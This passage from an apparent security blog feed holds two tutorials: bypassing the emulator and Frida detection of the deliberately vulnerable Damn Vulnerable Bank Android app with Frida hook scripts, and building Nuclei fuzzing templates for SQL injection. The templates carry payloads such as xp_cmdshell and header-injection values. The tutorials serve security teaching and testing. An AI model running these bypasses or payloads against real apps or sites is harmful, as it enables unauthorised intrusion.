#### **Key Features to Explore**

Damn Vulnerable Bank is packed with features that mimic a real banking app:

-   **User Authentication:** This includes everything from logging in to managing sessions. It sounds simple, but there&apos;s a lot that can go wrong if not done correctly.
-   **Account Management:** Check balances, transfer money, and set up payments—standard bank stuff that we&apos;ll dive into to uncover potential risks.
-   **Transaction Security:** Features like OTPs (One-Time Passwords) add an extra layer of security for transactions. We&apos;ll see how secure these really are when put to the test.
-   **Administrative Functions:** Reserved for the &apos;big bosses&apos; of the app, these functions allow control over user accounts and other critical settings.

Each of these features not only makes the app useful, but also a goldmine for learning about common security pitfalls and how to avoid or exploit them in the name of education.

#### **Why This Matters**

In essence, Damn Vulnerable Bank is your go-to resource if you’re keen to dive deep into the world of app security. It’s set up to help you understand and tackle real security challenges faced by apps today, all in a fun and safe environment.

## Installation of the application

To install the application, we can utilize ADB, a versatile tool discussed in the article referenced during the lab setup. ADB enables various administrative operations on Android systems.

```bash
adb connect &lt;ip&gt;
adb install &lt;apk&gt;

```

![](/content/images/2024/04/image-30.png)

Installing the apk via adb

After installation, by navigating to our applications, the new app will be clearly visible within the system.

![](/content/images/2024/04/image-31.png)

Application display

## Decompilation of the application

One issue that arises when attempting to open the application is that it immediately closes. I&apos;ve chosen this particular application to teach Android device hacking because it incorporates defense mechanisms that mimic real-world scenarios, thus providing a more authentic learning experience.

In such cases, we need to engage in some reverse engineering to understand the application&apos;s architecture. APKTool, an open-source utility, is instrumental for decompiling and recompiling APK files, the installation packages for Android apps. It extracts XML and .dex files from APKs and converts these .dex files into smali, a human-readable representation of the Dalvik bytecode executed by Android&apos;s runtime. This transformation grants access to the Android app&apos;s source code at the bytecode level, allowing for precise modifications. However, working with smali is inherently complex as it is closer to machine code than high-level Java, making it more challenging to read and comprehend. Later in this chapter, we will discuss techniques to convert the code back to Java for more straightforward analysis and modifications.

![](/content/images/2024/04/image-32.png)

Decompilation using apktool

![](/content/images/2024/05/image-2.png)

Example code in smali

Post-decompilation, we&apos;ll conduct an in-depth analysis of the application&apos;s components. Typically, the initial step involves examining the &quot;AndroidManifest.xml&quot; file, a critical element within any Android app. It acts as a roadmap, detailing vital information to the operating system about the application, including package name, version, required permissions, activities, services, broadcast receivers, and more.

![](/content/images/2024/04/image-47.png)

AndroidManifest.xml

In this scenario, since we&apos;re operating in a virtual environment, we will disable the hardware acceleration setting, which could be causing the application to crash. Setting its value to &apos;false&apos; should rectify the issue.
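For reference, hardware acceleration is controlled by the `android:hardwareAccelerated` attribute on the `application` element of `AndroidManifest.xml`. A minimal, illustrative excerpt (all other attributes omitted):

```xml
&lt;!-- Only the relevant attribute is shown; the real element carries many more --&gt;
&lt;application android:hardwareAccelerated=&quot;false&quot;&gt;
&lt;/application&gt;
```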

![](/content/images/2024/04/image-33.png)

Disabling GPU acceleration

Subsequently, we will uninstall the current application and compile a new APK with the hardware acceleration disabled:

```bash
adb uninstall com.app.damnvulnerablebank

```

```bash
apktool b dvba/ -o dvba-no-gpu.apk

```

## Signing the application

Attempting to install the newly compiled APK without GPU configuration will result in an error, as the application lacks a necessary security certificate. To resolve this, we&apos;ll create a keystore containing both a public and a private key:

![](/content/images/2024/04/image-35.png)

Attempt to install the application without signature

![](/content/images/2024/04/image-36.png)

&lt;details&gt;
&lt;summary&gt;Key generation&lt;/summary&gt;

```bash
keytool -genkey -v -keystore my-release-key.keystore -alias dvba-no-gpu.apk -keyalg RSA -keysize 2048 -validity 10000

```
&lt;/details&gt;


Next, we&apos;ll use jarsigner to sign the application using the keys we just generated:

```bash
# The last argument is the key alias, which keytool above created with the
# (confusing) name dvba-no-gpu.apk; the second-to-last is the APK to sign
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore dvba-no-gpu.apk dvba-no-gpu.apk

```

This process will allow you to install the application without encountering security errors. However, you may find that the application still closes immediately upon opening, suggesting the presence of another defense mechanism designed to thwart operation on rooted or emulated mobile devices.

## Reverse engineering

To address the immediate closure of the application upon opening, we need to delve into reverse engineering again. The first step is to decompile the application and retrieve the Java source code. For this, ApkX is an excellent choice. Unlike other tools that convert .dex files into lower-level formats like smali (apktool for example), ApkX directly decompiles these files back into Java. This approach provides a code representation that is much closer to the original, making it easier to read, understand, and modify. ApkX not only efficiently unpacks APKs and extracts files and resources but also uses advanced techniques to reconstruct a high-level overview of the application’s functionality, offering quick insights into its coding structure.

[GitHub - muellerberndt/apkx: One-Step APK Decompilation With Multiple Backends](https://github.com/muellerberndt/apkx)

![](/content/images/2024/04/image-38.png)

Use of APKx to decompile

Next, we need to identify the root cause of the application&apos;s behavior. Using tools like grep to search through the code can be highly effective. In this instance, searching for the term &quot;Emulator&quot; reveals relevant matches.
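As a minimal sketch of that workflow (the Java line below is an invented stand-in, not DVB&apos;s actual source), a recursive, case-insensitive `grep` over the decompiled tree surfaces candidate detection routines:

```bash
# Stand-in for the decompiled sources (this Java line is invented)
mkdir -p src
printf 'if (EmulatorDetector.isEmulator()) { finish(); }\n' > src/MainActivity.java

# Case-insensitive recursive search for common detection keywords
grep -rn -iE 'emulator|frida|rooted' src/
```

Each match comes back as `file:line:text`, which points you straight at the classes worth inspecting in detail.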

![](/content/images/2024/04/image-39.png)

Measurement detection against systems that are being Emulated

Examining the &quot;MainActivity.java&quot; file, it becomes apparent that the application is designed to terminate if it detects that the device is rooted or if tools like Frida are in use.

![](/content/images/2024/04/image-45.png)

Code to be executed in case of Frida detection or Emulation

To resolve the issue with the application, we have two options. One approach is to comment out the code that triggers the termination and recompile the application to create a patched version. The alternative, which we will pursue, is to use Frida to dynamically patch the application during runtime, circumventing the need for permanent modifications to the code.

Frida is a dynamic instrumentation toolkit widely used for debugging and analyzing application behaviors across various platforms, including Windows, macOS, Linux, iOS, and Android. It allows developers and security researchers to inject custom scripts into running processes to monitor, modify, and probe their internal operations. This is especially useful for identifying security vulnerabilities, diagnosing issues, or understanding complex software functionalities. Frida operates by attaching to the application process and provides a framework for executing real-time code snippets, intercepting function calls, and manipulating data and control flows within the app. Its capabilities make it an invaluable tool for dynamic analysis and reverse engineering tasks.

## Introduction to Frida

To begin using Frida for Android security auditing, the first step is to ensure the Frida server is running on the Android device. To determine the correct version of Frida server needed for your device or emulator, execute the following command:

```bash
adb connect &lt;ip&gt;
adb shell
uname -m 

```

![](/content/images/2024/05/image-3.png)

Architecture of my machine

Based on the architecture returned by the command, select the appropriate Frida server version.
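The mapping from `uname -m` output to Frida&apos;s release names can be scripted. The sketch below covers the common architectures and assumes Frida&apos;s usual `frida-server-&lt;version&gt;-android-&lt;arch&gt;.xz` naming, so double-check it against the actual release page.

```bash
# Map the output of uname -m to the matching Frida Android build name
ARCH=x86_64   # in practice: ARCH=$(adb shell uname -m)
case $ARCH in
  aarch64)       PKG=android-arm64 ;;
  armv7l|armv8l) PKG=android-arm ;;
  i686)          PKG=android-x86 ;;
  x86_64)        PKG=android-x86_64 ;;
esac
echo frida-server-14.1.3-$PKG.xz
```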

[Release Frida 14.1.3 · frida/frida](https://github.com/frida/frida/releases/tag/14.1.3)

![](/content/images/2024/04/image-42.png)

Version selected in my case

After determining the correct version, the next step involves transferring the Frida server binary to the Android device using the ADB tool. Here’s how you can upload the binary:

```bash
adb push frida-server /sdcard
adb shell
su
cp /sdcard/frida-server /data/local/
chmod +x /data/local/frida-server
/data/local/frida-server -l 0.0.0.0:27042

```

Once the Frida server is running, you can operate Frida from your machine. In the following example, I list the processes running on the mobile phone.

![](/content/images/2024/05/image.png)

Verifying that Frida is running correctly

The next crucial phase is crafting a Frida script that dynamically patches the application based on your specific needs. This aspect of an Android audit is incredibly powerful, as it allows you to modify virtually any behavior of the application, provided you understand the code.

We’ll use JavaScript for scripting. Below is a sample script with comments to guide you. This script changes the return value of a method so that the application does not terminate on an emulator:

```javascript
setTimeout(function() {
    Java.perform(function() {
        var className = &quot;a.a.a.a.a&quot;; // Ensure this is the correct class name

        try {
            var targetClass = Java.use(className);
            console.log(&apos;Class loaded:&apos;, className); // Confirmation that the class is loaded

            // Ensure that the method R exists before attempting to hook it
            if (targetClass.R) {
                var originalMethod = targetClass.R.implementation;

                targetClass.R.implementation = function() {
                    // Direct call to the original implementation within the new implementation
                    var originalReturnValue = this.R();
                    console.log(&quot;Original return value =&quot;, originalReturnValue); // Debug for original value

                    return !originalReturnValue; // Negate the original return value
                };

                console.log(&quot;Method &apos;R&apos; has been successfully hooked.&quot;);
            } else {
                console.log(&quot;Method &apos;R&apos; not found in class &quot; + className);
            }
        } catch (e) {
            console.log(&quot;Error while trying to hook the class or method:&quot;, e);
        }
    });
}, 10);

```

The effectiveness of the script is confirmed when we see that the method returns `true`, which leads to the application&apos;s termination. By flipping it to `false`, we bypass this check. However, the application still terminates because it detects the use of Frida:

```bash
frida -U -l bypass-detection.js -f com.app.damnvulnerablebank

```

![](/content/images/2024/05/image-1.png)

Detection of successfully evaded emulation

To overcome this, another script is needed to manipulate the Frida detection mechanism. Below is a script that alters the return value of the Frida detection function, ensuring the application does not terminate:

```javascript
Java.perform(function () {
    console.log(&quot;looking for FridaCheckJNI.fridaCheck()&quot;);

    try {
        const FridaCheckJNI = Java.use(&apos;com.app.damnvulnerablebank.FridaCheckJNI&apos;);

        FridaCheckJNI.fridaCheck.implementation = function() {
            console.log(&quot;hooking fridaCheck().&quot;);
            var value = this.fridaCheck.call(this);
            console.log(&quot;fridaCheck() returned &quot; + value);
            console.log(&quot;switching fridaCheck() to 0&quot;);
            return 0;  // Always return 0 to bypass checks
        };
    } catch (e) {
        console.log(&quot;Failed to hook fridaCheck: &quot; + e.message);
    }
});

```

Running both scripts together with Frida finally grants access to the application, circumventing the implemented security measures:

```bash
frida -U -l bypass-detection.js -l bypass-frida-check.js -f com.app.damnvulnerablebank

```

![](/content/images/2024/04/image-46.png)

Execution of both scripts to evade all detections

![](/content/images/2024/04/image-43.png)

Successful access to the application

# Conclusions: Empowering Mobile Application Security Through &quot;Damn Vulnerable Bank&quot;

In this opening chapter of our Android security series, we&apos;ve navigated through &quot;Damn Vulnerable Bank&quot; (DVB), a simulated environment for real-world vulnerabilities. Through robust methodologies, practical labs, and detailed analyses, this chapter has enhanced our ability to identify and exploit vulnerabilities, deepening our understanding of mobile application security&apos;s importance.

Adopting the OWASP Mobile Application Security Testing Guide (MASTG) provided a clear framework for auditing, while the setup flexibility of using either a physical device or a virtual machine enabled a realistic testing environment. DVB proved invaluable in demonstrating practical security weaknesses and exploring the technology stack including Java, Kotlin, SQLite, and the Android SDK integrated with a REST API.

Advanced techniques demonstrated with tools like APKTool and ApkX, and dynamic analysis with Frida, have highlighted the necessity of proactive security practices. By the end, not only have you learned to set up and dissect application security features but also understood the nuances of recompiling and signing applications to meet security standards. &quot;Damn Vulnerable Bank&quot; has opened the door to mastering mobile application security, setting the stage for further exploration and skill enhancement in subsequent chapters. Whether you&apos;re a beginner or a seasoned professional, the insights from this chapter are essential for anyone looking to improve mobile application security.

# Resources

[Damn Vulnerable Bank](https://rewanthtammana.com/damn-vulnerable-bank/index.html)</content:encoded><author>Ruben Santos</author></item><item><title>From Chaos to Clarity: The Art of Fuzzing with Nuclei</title><link>https://www.kayssel.com/post/nuclei-templates</link><guid isPermaLink="true">https://www.kayssel.com/post/nuclei-templates</guid><description>Embarking on a cybersecurity journey, we explore creating custom Nuclei templates for detecting SQLi in POST requests, leveraging mitmproxy for testing. This endeavor enhances our digital defenses by merging Nuclei&apos;s precision with fuzzing&apos;s unpredictability.</description><pubDate>Thu, 18 Apr 2024 06:56:55 GMT</pubDate><content:encoded># Introduction

In the vast and ever-evolving universe of cybersecurity, where digital threats constantly morph and lurk in the shadows, I embark on a personal crusade to fortify our digital defenses. This installment of my blog marks the beginning of an exhilarating venture: the creation of a personal repository of custom Nuclei templates. Each template, crafted from my experiences and insights, is a key designed to unlock the mysteries of unseen vulnerabilities through the art of fuzzing. Today, we zero in on developing a specialized template to sniff out SQL Injection (SQLi) vulnerabilities in POST requests, venturing beyond mere vulnerability scanning to chart unexplored territories with Nuclei and fuzzing. Here are the main takeaways from our upcoming exploration:

-   **Advancing Cybersecurity with Nuclei:** Leveraging Nuclei&apos;s robust framework to develop custom templates that enhance our ability to detect and analyze vulnerabilities. This approach underscores the importance of precision and adaptability in our defense mechanisms.
-   **The Technical Core of SQLi Detection:** Exploring the technical nuances of crafting a Nuclei template specifically designed to detect SQLi vulnerabilities in POST requests. This includes a detailed examination of payload construction, filtering conditions, and the strategic implementation of fuzzing techniques to identify vulnerabilities that evade conventional detection methods.
-   **Integrating mitmproxy for Enhanced Testing:** Utilizing mitmproxy, a versatile tool for intercepting, inspecting, modifying, and replaying HTTP traffic, to capture and format requests in a Nuclei-compatible format. This step is crucial for setting up accurate and effective testing environments, demonstrating the synergy between various cybersecurity tools in identifying and mitigating vulnerabilities.

Join me as we delve into the nuances of crafting a Nuclei template, an exploration that is more than a tutorial—it&apos;s a testament to the commitment to bolstering our digital fortifications, one template at a time. Together, let&apos;s navigate this journey towards a more secure digital future.

# Nuclei and Fuzzing: A Quick Refresh

Remember our adventures through the digital landscape in previous chapters? We took a deep dive into the world of Nuclei in one thrilling episode, exploring how this ingenious tool acts like a digital Sherlock Holmes, meticulously sifting through web applications and networks with its template-based detection. Then, we embarked on a wild ride with fuzzing in our exploration of ffuf, where we embraced the chaos of sending a barrage of unexpected data at applications just to see what breaks. It&apos;s time to connect those dots.

[**Revisiting Nuclei**](https://www.kayssel.com/post/nuclei/): Cast your mind back to when we first met [Nuclei](https://github.com/projectdiscovery/nuclei). We touched on its ability to use predefined templates for vulnerability detection, making it an indispensable tool for cybersecurity professionals looking to write their own detective stories. Yes, Nuclei is that specialized scanner from Project Discovery that allows for such tailored investigations, enabling us to target specific vulnerabilities with precision. Think of it as having a highly customized magnifying glass to spot those digital clues.

[**Fuzzing - The Art of Digital Chaos, Revisited**](https://www.kayssel.com/post/hacking-web-3/): And who could forget our venture into the world of fuzzing with ffuf? We learned that fuzzing isn’t just about creating a mess; it’s a calculated strategy to unearth vulnerabilities that are so well-hidden they’re practically incognito. By challenging software with the unexpected—inputs that defy the norm—we push systems to their limits, revealing weaknesses that standard testing might miss.

As we gear up to dive deeper into leveraging Nuclei with custom templates for fuzzing, let’s not forget the ground we’ve covered. We&apos;ve seen the precision of Nuclei and the controlled chaos of fuzzing with ffuf. Now, it’s time to see how these methodologies can be combined and elevated. Our journey into the advanced use of Nuclei for discovering previously undetected vulnerabilities begins here. Buckle up; it’s going to be an insightful ride.

# Advanced Fuzzing with Custom Nuclei Templates

In the realm of cybersecurity, Nuclei stands out for its capacity to execute advanced fuzzing via custom templates. By fully leveraging Nuclei’s capabilities, security enthusiasts are equipped to conduct precise and adaptable penetration testing, uncovering vulnerabilities that have eluded detection. Let’s delve into the critical elements that endow Nuclei with such prowess in fuzzing, followed by an illustrative example of a template.

#### The Essentials of Crafting Nuclei Fuzzing Templates

**Supported Fuzzing Parts:** Nuclei templates offer the versatility to target specific segments of an HTTP request, enhancing the tool’s applicability across various fuzzing scenarios. The parts that can be targeted include:

-   **Query**: For the manipulation of query parameters.
-   **Path**: To alter URL paths.
-   **Header**: For modifying request headers.
-   **Cookie**: To adjust cookie values.
-   **Body**: Tailoring the request body&apos;s content, compatible with formats such as JSON, XML, Form, and multipart-form data.

This granularity enables the simulation of a wide array of attack vectors, enriching the fuzzing landscape.
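
As a minimal sketch (my own, reusing the rule fields from the templates later in this article, so treat it as illustrative rather than a template from the original post), a rule targeting the query part rather than the body might look like:

```yaml
http:
  - fuzzing:
      - part: query   # target query-string parameters instead of the body
        type: postfix # append the payload to each existing value
        mode: single  # fuzz one parameter at a time
        fuzz:
          - &quot;&apos;&quot;       # single-quote probe
```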

**Rule Types:** To cater to diverse fuzzing needs, Nuclei supports a plethora of rule types for payload insertion:

-   **Prefix**: Prepending a payload before the value.
-   **Postfix**: Appending a payload after the value.
-   **Replace**: Substituting the value with a payload.
-   **Infix**: Embedding a payload within the value.
-   **Replace-regex**: Leveraging regex for sophisticated replacement operations.

These rule types provide the flexibility necessary to craft templates that can probe for an extensive range of vulnerabilities.
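
To make the difference between rule types concrete, here is an illustrative sketch of my own (using the same field names as the templates in this article) that applies one payload with two different types:

```yaml
http:
  - fuzzing:
      - part: query
        type: prefix   # payload goes before the existing value
        mode: single
        fuzz:
          - &quot;{{injection}}&quot;
      - part: query
        type: replace  # existing value is discarded and replaced by the payload
        mode: single
        fuzz:
          - &quot;{{injection}}&quot;
```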

**Loading HTTP Traffic:** Nuclei’s ability to import HTTP traffic from various sources significantly broadens its testing scope:

-   Compatibility with tools such as Burp Suite, httpx, and Proxify.
-   Support for API schema files like OpenAPI, Swagger, and Postman collections.

These integrations ensure that fuzzing efforts closely mirror real-world traffic patterns, increasing the likelihood of uncovering critical security issues.

**Filters:** A key aspect of refining the fuzzing process is the use of filters within Nuclei templates. Filters allow for the specification of conditions under which a template is activated, based on the characteristics of the HTTP request. This targeted approach aids in minimizing unnecessary noise and focusing efforts on potentially vulnerable areas.

**Efficiency Through Abstraction:** Nuclei enhances template creation efficiency by abstracting the parts of the HTTP request into key-value pairs. This abstraction simplifies the application of fuzzing rules across different data formats, enabling broader testing capabilities with fewer templates.
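
For example, because the body is abstracted into key-value pairs, a single rule can fuzz a given field whether it arrives as form data or JSON. The sketch below is my own illustration (the `keys` filter for scoping a rule to specific parameter names comes from ProjectDiscovery&apos;s fuzzing documentation; the `username` parameter is an assumed example):

```yaml
http:
  - fuzzing:
      - part: body
        type: postfix
        mode: single
        keys:
          - username # assumed parameter name; only this key&apos;s value is fuzzed
        fuzz:
          - &quot;{{injection}}&quot;
```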

#### Illustrative Template Example: Header Manipulation for Security Testing

Below is a detailed Nuclei template designed to test the security robustness of web applications by manipulating HTTP headers. This template specifically aims to identify vulnerabilities that could be exploited via header injection attacks, a technique often used in web application attacks such as HTTP Request Smuggling or Web Cache Poisoning:

```yaml
http:
  - pre-condition:
      - type: dsl
        dsl:
          - &apos;method == &quot;POST&quot;&apos;       # only run if method is POST
          - &apos;contains(path,&quot;reset&quot;)&apos; # only run if path contains the word &quot;reset&quot;
        condition: and
    # fuzzing rules
    fuzzing:
      - part: header # This rule will be applied to the header
        type: replace # replace type of rule (i.e., existing values will be replaced with payload)
        mode: multiple # multiple mode (i.e., all existing values will be replaced/used at once)
        fuzz:
          X-Forwarded-For: &quot;{{domain}}&quot;  # here {{domain}} is an attacker-controlled server
          X-Forwarded-Host: &quot;{{domain}}&quot;
          Forwarded: &quot;{{domain}}&quot;
          X-Real-IP: &quot;{{domain}}&quot;
          X-Original-URL: &quot;{{domain}}&quot;
          X-Rewrite-URL: &quot;{{domain}}&quot;
          Host: &quot;{{domain}}&quot;
```

**Template Insights:**

-   **Pre-Condition**: The template is triggered based on pre-defined conditions, ensuring it&apos;s executed for POST requests that include &quot;reset&quot; in the path. This specificity helps focus the fuzzing efforts on potentially vulnerable endpoints involved in sensitive operations like password resets.
-   **Fuzzing Rules**: The core of this template lies in its fuzzing rules, where it replaces existing header values with payloads that include a domain controlled by the attacker. This method tests the application&apos;s handling of headers and whether it&apos;s possible to manipulate the application&apos;s behavior or leak sensitive information by injecting malicious header values.
-   **Mode**: By setting the mode to &quot;multiple,&quot; the template ensures that all specified headers are modified in a single request, allowing for comprehensive testing of the application’s response to multiple, simultaneous header manipulations.

# Methodology for creating templates

### **Beginning the Template Creation Process**

To kick off the template creation, we first need to capture a typical request, such as a login attempt. This task can be accomplished using any proxy tool; in this scenario, I&apos;ve opted for mitmproxy for its ease of use and versatility.

![](/content/images/2024/04/image-20.png)

Login Portal

![](/content/images/2024/04/image-21.png)

Login request screenshot

### **Handling GET vs. POST Requests with Nuclei**

Auditing GET requests with Nuclei is fairly straightforward: we simply input the URL and, if necessary, provide authentication cookies for testing. However, auditing POST requests requires a more tailored approach due to the specific format needed for Nuclei analysis. To audit effectively with Nuclei, our captured request must be in one of the following formats: Burp, JSONL, YAML, OpenAPI, or Swagger. In this context, we&apos;ll demonstrate how to convert a request into the JSONL format using a command in mitmproxy. Should you be utilizing Burp, you have the convenience of directly copying a request in the required format.

### **Transforming Requests into Nuclei-Compatible Format**

Below is a Python snippet that defines a mitmproxy command to log URLs and, where relevant, the bodies of POST requests in a JSONL format compatible with Nuclei&apos;s requirements:

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    If you want to know more about mounting commands, I recommend you to take a look at the &lt;a href=&quot;https://www.kayssel.com/post/proxy/&quot;&gt;chapter where we talk about mitmproxy.&lt;/a&gt;
  &lt;/div&gt;
&lt;/div&gt;

```python
import json
import os
from datetime import datetime, timezone

from mitmproxy import command, ctx, flow, types


class HackingCommands:  # illustrative addon class; register with addons = [HackingCommands()]
    @command.command(&quot;hacking.log_urls_in_nuclei_format_with_body&quot;)
    def log_urls_in_nuclei_format_with_body(self, flows: types.Sequence[flow.Flow]) -&gt; None:
        &quot;&quot;&quot;
        Logs URLs and, if applicable, POST request bodies in a JSONL format that aligns with Nuclei&apos;s expectations.
        &quot;&quot;&quot;
        export_dir = os.path.join(os.getcwd(), &quot;nuclei_formatted_urls_with_body&quot;)
        os.makedirs(export_dir, exist_ok=True)
        
        filename = &quot;nuclei_formatted_urls_with_body.jsonl&quot;
        filepath = os.path.join(export_dir, filename)

        with open(filepath, &quot;a&quot;) as file:
            for flow in flows:
                # Simplify the header and include body if the method is POST
                method = flow.request.method
                body = flow.request.get_text(strict=False) if method == &quot;POST&quot; else &quot;&quot;
                headers = {name: value for name, value in flow.request.headers.items()}
                
                # Construct the raw request string, including the body for POST requests
                raw_request_lines = [
                    f&quot;{method} {flow.request.path} HTTP/1.1&quot;,
                    *[f&quot;{name}: {value}&quot; for name, value in headers.items()],
                    &quot;&quot;,  # End of headers
                    body
                ]
                raw_request = &quot;\r\n&quot;.join(raw_request_lines)

                # Create the entry to be logged
                nuclei_entry = {
                    &quot;timestamp&quot;: datetime.now(timezone.utc).isoformat(),
                    &quot;url&quot;: flow.request.pretty_url,
                    &quot;request&quot;: {
                        &quot;header&quot;: headers,
                        &quot;raw&quot;: raw_request
                    },
                    # Omitting the response part in this example
                }

                file.write(json.dumps(nuclei_entry) + &quot;\n&quot;)
        
        ctx.log.info(f&quot;URLs and POST bodies logged in Nuclei-compatible format: {filepath}&quot;)

```

### **Utilizing the Command in Mitmproxy**

To apply the command in mitmproxy and convert a selected request into JSONL format, you can use the following command:

```bash
hacking.log_urls_in_nuclei_format_with_body @focus

```

![](/content/images/2024/04/image-22.png)

Command usage with mitmproxy

![](/content/images/2024/04/image-25.png)

Request after formatting

This streamlined process allows us to efficiently capture and format requests, paving the way for thorough vulnerability assessments with Nuclei.

## Creating the template

To begin with, I have taken a small template from one of the resources at the end of the article. The content is as follows:

```yaml
http:
    # filter checks if the template should be executed on a given request
  - filters:
      - type: dsl
        dsl:
          - method == POST
          - len(body) &gt; 0
        condition: and
    # payloads that will be used in fuzzing
    payloads:
      injection: # Variable name for payload
        - &quot;&apos;&quot;
        - &quot;\&quot;&quot;
        - &quot;;&quot;
    # fuzzing rules
    fuzzing:
      - part: body  # This rule will be applied to the Body
        type: postfix # postfix type of rule (i.e., payload will be added at the end of existing value)
        mode: single  # single mode (i.e., existing values will be replaced one at a time)
        fuzz:         # format of payload to be injected
          - &apos;{{injection}}&apos; # here, we are directly using the value of the injection variable


```

### Unpacking the Nuclei Template

Imagine you’re a detective, and your job is to find the hidden doors and weak spots in a building (in our case, a web application). A Nuclei template is your map and toolkit rolled into one, guiding you where to look and what tools to use.

#### The Blueprint: Filters

First up, we have the `filters`. Think of this as your checklist before you embark on your investigation. The template specifies two main conditions under this section:

-   The method of communication must be a `POST` request, akin to sending a parcel rather than just a letter, requiring a response from the recipient.
-   The parcel (the body of the request) cannot be empty; it must contain something to probe the application&apos;s reaction.

The rule here is straightforward: both conditions must be met (`condition: and`) for our investigative tool to spring into action.

#### The Toolkit: Payloads

Next, we delve into the `payloads` section. Here, we find an array of peculiar phrases or symbols - in our case, a single quote (`&apos;`), a double quote (`&quot;`), and a semicolon (`;`). These might seem innocuous at first glance, but they&apos;re akin to picking locks in the digital world. Each one is a test to see if we can trip up the application&apos;s normal processing and reveal hidden vulnerabilities.

#### The Strategy: Fuzzing Rules

Finally, the `fuzzing` section lays out our strategy for using these tools. Here’s the breakdown:

-   We’re targeting the `body` of the request, the main content of our digital parcel.
-   We employ a `postfix` approach, adding our lock-picking tools to the end of the existing message, tweaking the message&apos;s tail to see if it unlocks any reactions.
-   Our mode of operation is `single`, meaning we test one tool at a time, giving each its moment to shine or fail, ensuring we can pinpoint exactly which tool reveals a vulnerability.
-   The `fuzz` key tells us we’re directly using our array of tools (`injection` payloads) in this operation, applying them precisely as outlined in our toolkit.

### **Launching the Template**

For execution, metadata must precede the template. Here&apos;s an example:

```yaml
id: testing-sqli
info:
  name: SQLi POST request
  author: rsgbengi
  severity: critical
  tags: sqli,dast

```

Executing the template to detect vulnerabilities is straightforward. However, enabling debug mode and using a proxy for manual request testing is advisable:

```bash
nuclei -im jsonl -l nuclei_formatted_urls_with_body/nuclei_formatted_urls_with_body.jsonl -debug -t sqli-post.yaml -proxy http://127.0.0.1:8888

```

![](/content/images/2024/04/image-23.png)

The `filters` key has not been recognized

Despite encountering errors related to &quot;filters&quot; in my current Nuclei version, I&apos;ve improvised by integrating a matcher designed to identify specific keywords, albeit with a potential for false positives:

```yaml
  - matchers:
      - type: dsl
        dsl:
          - &apos;method == &quot;POST&quot;&apos;
          - len(body) &gt; 0
        condition: and
      - type: word
        name: node
        words:
          - &quot;Error&quot;
          - &quot;SQL&quot;

```

To streamline testing, I&apos;ve employed the `stop-at-first-match` option to cease execution upon the first match, avoiding exhaustive combinatorial testing:

```yaml
    stop-at-first-match: true

```

&lt;details&gt;
&lt;summary&gt;The complete template I am going to use can be found here:&lt;/summary&gt;

```yaml
id: testing-sqli
info:
  name: SQLi POST request
  author: rsgbengi
  severity: critical
  tags: sqli,dast
http:
  - matchers:
      - type: dsl
        dsl:
          - &apos;method == &quot;POST&quot;&apos;
          - len(body) &gt; 0
        condition: and
      - type: word
        name: node
        words:
          - &quot;Error&quot;
          - &quot;SQL&quot;
    stop-at-first-match: true
    payloads:
      injection: 
        - &quot;&apos;&quot;
        - &quot;\&quot;&quot;
        - &quot;;&quot;
    fuzzing:
      - part: body  
        type: postfix 
        mode: single  
        fuzz:         
          - &apos;{{injection}}&apos; 
```
&lt;/details&gt;


If we run it again with these changes, we can see that we do indeed detect the SQLi vulnerability thanks to the word &quot;Error&quot;.

![](/content/images/2024/04/image-26.png)

Payload added at the end

![](/content/images/2024/04/image-27.png)

Identification of possible injection from &quot;Error&quot;

#### The Refined Template

Enhancing our template to reduce false positives involves incorporating more selective error messages:

```yaml
id: refined-testing-sqli
info:
  name: Refined SQLi POST Request Detection
  author: rsgbengi (refined)
  severity: critical
  tags: sqli,dast
http:
  - method: POST
    matchers:
      - type: dsl
        dsl:
          - &quot;method == &apos;POST&apos;&quot;
          - &quot;len(body) &gt; 0&quot;
        condition: and
      - type: regex
        name: sql_error
        regex:
          - &quot;You have an error in your SQL syntax;&quot;
          - &quot;Warning: mysql_fetch_assoc()&quot;
          - &quot;Unclosed quotation mark after the character string&quot;
          - &quot;ORA-[0-9]{5}&quot;
        condition: or
      - type: status
        status:
          - 500
          - 200
    payloads:
      injection:
        - &quot;&apos; OR &apos;1&apos;=&apos;1&quot;
        - &quot;1&apos; WAITFOR DELAY &apos;0:0:5&apos; --&quot;
        - &quot;&apos; EXEC xp_cmdshell(&apos;dir&apos;) --&quot;
    fuzzing:
      - part: body
        type: postfix
        mode: single
        fuzz:
          - &quot;{{injection}}&quot;
    stop-at-first-match: true

```

![](/content/images/2024/04/image-28.png)

Detection of vulnerability from error 500

In any case, for SQLi you can use the regexes that come in this template, adding or removing patterns as you find them:

[fuzzing-templates/sqli/error-based.yaml at main · projectdiscovery/fuzzing-templates](https://github.com/projectdiscovery/fuzzing-templates/blob/main/sqli/error-based.yaml)

On the other hand, for quick template creation, there is a Burp plugin that automates a large part of the process. Here is the link in case you want to take a look:

[GitHub - projectdiscovery/nuclei-burp-plugin: Nuclei plugin for BurpSuite](https://github.com/projectdiscovery/nuclei-burp-plugin?tab=readme-ov-file)

# Conclusions

As we wrap up this chapter of our cybersecurity odyssey, it&apos;s clear that the fusion of Nuclei&apos;s targeted precision with the dynamic unpredictability of fuzzing opens new frontiers in the battle against digital vulnerabilities. The journey we embarked on today—starting with the crafting of a custom Nuclei template for detecting SQL Injection in POST requests—serves as a cornerstone in our ongoing quest to safeguard the digital realm.

This personal endeavor to build a repository of Nuclei templates is not just about enhancing our defensive arsenal; it&apos;s a testament to the power of collective wisdom and individual initiative in the cybersecurity community. By sharing these insights and tools, we not only strengthen our own defenses but also contribute to the broader network of digital protectors.

I encourage you to dive deeper, to explore the intricacies of Nuclei and the art of fuzzing further. The resources section below is a treasure trove of knowledge, meticulously curated to guide your journey through the complex tapestry of cybersecurity. Whether you&apos;re looking to refine your skills, seeking inspiration for your next project, or simply curious about the latest in vulnerability scanning and detection, these resources are your gateway to a wealth of information.

Let&apos;s continue to learn, to experiment, and to share. The path to mastering cybersecurity is an ever-evolving journey, filled with challenges and triumphs. By exploring the resources provided, engaging with the community, and contributing our unique insights, we not only defend against the threats of today but also prepare for the unknown challenges of tomorrow.

Thank you for joining me on this adventure. Together, let&apos;s forge ahead, armed with knowledge and innovation, in our relentless pursuit of a secure digital future.

# Resources

[Introduction to Nuclei Templates - ProjectDiscovery Documentation](https://docs.projectdiscovery.io/templates/introduction)

